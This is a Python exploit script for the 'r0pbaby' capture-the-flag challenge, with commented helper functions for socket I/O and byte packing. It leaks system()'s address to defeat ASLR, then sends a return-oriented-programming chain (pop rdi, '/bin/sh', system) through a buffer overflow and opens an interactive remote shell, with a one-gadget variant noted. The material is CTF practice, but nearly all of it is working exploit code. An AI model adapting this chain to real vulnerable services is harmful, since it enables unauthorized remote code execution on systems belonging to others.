#!/usr/bin/env python
import random
import re
import socket
import string
import struct
import sys
import telnetlib
import time
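# Target selection. The commented-out line is the remote endpoint used during the
# CTF; the default is a local copy of the service. Host and port can be overridden
# from the command line (./ropbaby.py HOST PORT) instead of editing the file.
#s = socket.create_connection(("r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me", 10436))
HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 13337
# NOTE: the connection is opened at import time, so every helper below assumes
# a live listener at HOST:PORT and shares this one global socket.
s = socket.create_connection((HOST, PORT))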
def interact():
    """Hand the global socket to an interactive telnet-style session.

    Used once the ROP chain has (hopefully) spawned a shell, so the operator
    can type commands directly. Note that ``telnetlib`` is deprecated
    (PEP 594) and removed from the standard library in Python 3.13.
    """
    session = telnetlib.Telnet()
    # Telnet() is only used for its interact() loop; attach our existing socket
    # instead of letting it open a new connection.
    session.sock = s
    session.interact()
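def ra(to=.5):
    """Drain whatever the service has sent, stopping after a short quiet period.

    The socket is switched to non-blocking mode and polled. Reading stops when
    ``to`` seconds pass with data already buffered (output went quiet), or when
    ``2*to`` seconds pass without any data at all. The deadline restarts each
    time a chunk arrives, so a slow but steady stream is read in full.

    Args:
        to: idle timeout in seconds (default 0.5).

    Returns:
        Everything received, possibly an empty string.
    """
    buf = ""
    s.setblocking(0)
    begin = time.time()
    try:
        while True:
            elapsed = time.time() - begin
            # Quiet for `to` after seeing output, or nothing at all for 2*to: done.
            if buf and elapsed > to:
                break
            if elapsed > to * 2:
                break
            try:
                data = s.recv(4096)
            except socket.error:
                # Non-blocking recv with nothing queued raises EAGAIN/EWOULDBLOCK;
                # back off briefly rather than spinning on the CPU. Only socket
                # errors are swallowed, so Ctrl-C still interrupts the loop.
                time.sleep(.1)
                continue
            if not data:
                # Peer closed its side: nothing more will ever arrive.
                break
            begin = time.time()
            buf += data
    finally:
        # Restore blocking mode even if interrupted, so later rt()/se() behave.
        s.setblocking(1)
    return buf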
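def rt(delim):
    """Read one byte at a time from the connection until *delim* has been seen.

    Byte-at-a-time reads never consume anything past the delimiter, which
    matters because the next rt()/ra() call must start exactly there.

    Args:
        delim: substring to stop at; it is included in the return value.

    Returns:
        Everything read, ending with *delim*.

    Raises:
        EOFError: the peer closed the connection before *delim* arrived.
            (Previously this looped forever, since recv() keeps returning "".)
    """
    buf = ""
    # Since bytes arrive one at a time, the first occurrence of delim is always
    # at the tail, so endswith() is equivalent to the substring test and O(len(delim)).
    while not buf.endswith(delim):
        chunk = s.recv(1)
        if not chunk:
            raise EOFError("connection closed while waiting for %r (got %r)" % (delim, buf))
        buf += chunk
    return buf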
def se(data):
    """Write *data* completely to the global connection (blocks until sent)."""
    conn = s
    conn.sendall(data)
def u32(d):
    """Unpack exactly 4 bytes of *d* as a little-endian unsigned 32-bit integer."""
    (value,) = struct.unpack("<I", d)
    return value
def u64(d):
    """Unpack exactly 8 bytes of *d* as a little-endian unsigned 64-bit integer."""
    (value,) = struct.unpack("<Q", d)
    return value
def p32(d):
    """Pack integer *d* as 4 little-endian bytes (raises on values outside 0..2**32-1)."""
    packer = struct.Struct("<I")
    return packer.pack(d)
def p64(d):
    """Pack integer *d* as 8 little-endian bytes (raises on values outside 0..2**64-1)."""
    packer = struct.Struct("<Q")
    return packer.pack(d)
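def rstr(l):
    """Return *l* random ASCII letters/digits, e.g. as filler for a payload.

    Fix: the original called ``random.choice`` without ever importing ``random``,
    so any call raised NameError. ``random`` is fine for padding but is NOT a
    cryptographically secure generator; do not use this for tokens or nonces.

    Args:
        l: number of characters to generate (0 yields "").
    """
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choice(alphabet) for _ in range(l))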
def pwn():
    """Leak system()'s address via menu option 2, then deliver a ROP chain via option 3.

    The service prints the address of a requested libc symbol (option 2), which
    gives us the libc base despite ASLR. Option 3 takes a length then a buffer;
    the 8-byte filler in front of the chain presumably reaches the saved return
    address. Every offset below is relative to the leak and specific to the
    challenge's libc build — recompute them for any other libc.
    """
    # Challenge-specific libc offsets.
    SYSTEM_OFF = 0x46640      # system()
    BIN_SH_OFF = 0x17ccdb     # "/bin/sh" string
    POP_RDI_OFF = 0x22b1a     # pop rdi ; ret gadget
    ONE_SHOT_OFF = 0xe681d    # single-gadget shell, alternative to the chain below

    # Option 2: the reply contains "system: 0x...\n"; keep only the hex value.
    se("2\n")
    se("system\n")
    rt("system: ")
    leaked = rt("\n")[:-1]
    system = int(leaked, 16)
    base = system - SYSTEM_OFF
    print("[+] libc @  " + hex(base))

    # Chain: pop rdi <- "/bin/sh"; call system. NOTE(review): if system() faults
    # on a movaps instruction, the stack is not 16-byte aligned — insert an
    # extra `ret` gadget before pop_rdi. Not needed for this build as written.
    bin_sh_string = base + BIN_SH_OFF
    pop_rdi = base + POP_RDI_OFF
    rop_chain = "A" * 8 + p64(pop_rdi) + p64(bin_sh_string) + p64(system)
    # Simpler equivalent using the one-gadget:
    # rop_chain = "A" * 8 + p64(base + ONE_SHOT_OFF)

    # Option 3: send the length, then the payload itself.
    se("3\n")
    se(str(len(rop_chain)) + "\n")
    se(rop_chain + "\n")
    ra()
    print("[+] shell: ")
    interact()
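# Only run the exploit when executed as a script, not when the helpers are imported.
if __name__ == "__main__":
    pwn()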